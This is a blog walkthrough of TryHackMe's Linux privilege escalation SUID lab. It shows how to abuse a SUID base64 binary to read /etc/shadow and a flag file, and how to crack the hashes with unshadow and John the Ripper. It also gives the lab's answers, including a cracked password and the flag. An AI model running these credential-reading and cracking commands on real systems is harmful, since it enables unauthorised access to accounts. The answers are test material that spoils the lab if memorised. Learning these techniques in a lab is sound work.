This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation SUID Solution
Which user shares the name of a great comic book writer?
- Execute
cat /etc/passwd/
Answer: gerryconway
What is the password of user2?
Type
find / -type f -perm -04000 -ls 2>/dev/null
to list files that have SUID or SGID bits set.Go to https://gtfobins.github.io/#+suid to get list of appliations exploitable when SUID bit is set.
Can see that base64 is exploitable and we can escalate privileges using SUID.
Using the guide that gtfobins gave us we execute the following:
LFILE=/etc/shadow base64 "$LFILE" | base64 --decode
Create a local file
passwd.txt
andshadow.txt
and copy the content from the target machine.Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run john the ripper on
passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Answer: Password1
What is the content of the flag3.txt file?
Let's first check the home directory for the
flag3.txt
file.Let's run the command agin provided by GTFO.
LFILE=/home/ubuntu/flag3.txt
base64 "$LFILE" | base64 --decode
Answer: THM-3847834
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)